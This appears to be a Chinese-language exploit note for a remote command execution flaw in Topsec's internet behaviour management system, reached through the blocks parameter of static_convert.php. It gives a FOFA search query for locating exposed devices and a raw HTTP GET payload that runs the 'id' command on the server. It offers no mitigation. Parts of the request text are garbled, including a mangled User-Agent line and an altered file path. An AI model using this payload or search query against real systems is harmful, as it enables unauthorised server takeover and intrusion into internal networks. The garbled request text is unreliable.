T3-2天融信-上网行为管理-RCE
漏洞描述:
天融信上网行为管理系统 /view/IPV6/naborTable/static_convert.php接口blocks参数存在任意命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。
网站图片:
fofa语法:
body=“/upload/images/arrow03.png” && body=“400-7770777”
漏洞复现:
payload:
GET·/view/IPV6/naborTable/static convert.php?blocks[e]=id HTTP/1.1
Host :xxxx
User-Agent:Mozilla/5.0 (Windows NT·10.0;·Win64;x64)AppleWebKit/53736(KHTML,"like Gecko)·chrome/123.0.0.0 safari/537.36 Edg/123.0.0.0maglev/24033.813.2773.520/49Connection:*close
效果图: